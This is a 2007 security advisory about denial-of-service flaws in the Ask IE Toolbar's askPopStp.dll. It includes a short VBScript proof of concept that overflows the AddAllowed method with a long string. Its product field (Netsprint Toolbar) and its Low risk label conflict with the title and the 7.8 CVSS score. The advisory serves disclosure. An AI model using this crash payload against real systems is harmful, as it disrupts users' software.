Multiple Ask IE Toolbar denial of service vulnerabilities

2007.04.26
Credit: Michal Bucko
Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

Synopsis: Multiple Ask IE Toolbar denial of service vulnerabilities Product: Netsprint Toolbar Version: 1.1 Author: Michal Bucko (sapheal) Issue: ====== Multiple functions (in askPopStp.dll) suffer from improper memory handling, which results in denial of service conditions. Details: ======== Sample demonstration file (WSH script) is shown below. <?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:89D30B4C-2408-4E78-A334-8FF8A9713EA7' id='target' /> <script language='vbscript'> arg=String(4000, "A") target.AddAllowed arg </script></job></package> Credits: ======== Michal Bucko (sapheal) Disclaimer: =========== This document and all the information it contains are provided "as is", for educational purposes only, without warranty of any kind, whether express or implied. The authors reserve the right not to be responsible for the topicality, correctness, completeness or quality of the information provided in this document. Liability claims regarding damage caused by the use of any information provided, including any kind of information which is incomplete or incorrect, will therefore be rejected.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top